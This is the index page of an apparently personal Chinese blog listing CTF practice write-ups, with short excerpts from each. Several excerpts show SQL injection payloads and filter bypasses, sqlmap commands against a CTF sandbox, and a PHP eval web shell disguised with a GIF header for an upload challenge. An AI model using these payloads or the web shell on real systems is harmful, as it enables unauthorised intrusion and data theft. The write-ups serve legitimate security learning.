乐呵呵、欢的博客

lehhair's Blog

CTF学习

NSSCTF刷题

NSSCTF刷题 [SWPUCTF 2021 新生赛]gift_F12 直接f12搜索flag [SWPUCTF 2021 新生赛]jicao <?php highlight_file('index.php'); include("flag.php"); $id=$_POST['id']; $js
125
0
1
2023-10-22

ctfshow刷题

ctfshow web1-签到 直接查看网页源码,看见base64编码,解码后得到flag web2-最简单的SQL注入 看见输入框直接尝试万能密码 username=admin' or 1 = 1 union select 1,group_concat(table_name),3 from inf
240
0
0
2023-08-06

buuctf刷题

buu刷题 [极客大挑战 2019]PHP 打开后是一只猫,看看前端源码也没啥发现的,直接目录扫描\ 使用dirsearch扫描到源码www.zip\ 解压后发现有index.php和class.php index.php <?php include 'class.php'; $se
105
0
0
2023-08-04

sqlilabs-记录

sqlilabs 刷题记录 SQLi-LABS Page-1 less-1(get-error based - single quotes - string) ?id=1' and 1=1 --+ # and 1=1 为真,所以页面正常显示 ?id=1' order by 1 --+ # 使用or
225
1
1
2023-07-25

buuctf-upload1

[ACTF2020 新生赛]Upload 1 打开靶机 根据提示发现只能上传图片文件 修改文件名之后发现上传依旧不可行,尝试伪造文件头 GIF89a <script language='php'>@eval($_POST['root']);</script>
146
0
0
2023-04-25

23/04/23学习

[极客大挑战 2019]BabySQL 1.打开靶机 2.尝试 pwd'union select 1,2,3# 过滤掉了union 和 select,双写试试 pwd'ununionion selselectect 1,2,3# <
37
0
0
2023-04-23

学习-230419

buctf-[强网杯 2019]随便注 0'; show databases; # 0'; show tables; # 1'; show columns from words; # 0'; show columns from `1919810931114514 `; # 1';rename ta
46
0
0
2023-04-19

[极客大挑战 2019]LoveSQL 1

[极客大挑战 2019]LoveSQL 试试万能密码 admin' or '1'='1 这是一个经典的SQL注入示例,试图通过使用万能密码绕过身份验证。在这种情况下,SQL查询将成为以下内容: SELECT * FROM users WHERE username='admin' or '1'='1
44
0
0
2023-04-17

记一次队内测试

记一次队内测试 web签到题 打开靶机 尝试bp抓包 全选,send to repeater
81
0
0
2023-04-15

ctfhub-web入门-报错注入

ctfhub-web入门-报错注入 python3 sqlmap.py -u http://challenge-cae317e1b2712c27.sandbox.ctfhub.com:10800/?id=1 -dbs python3 sqlmap.py -u http://challenge-ca
57
0
0
2023-04-12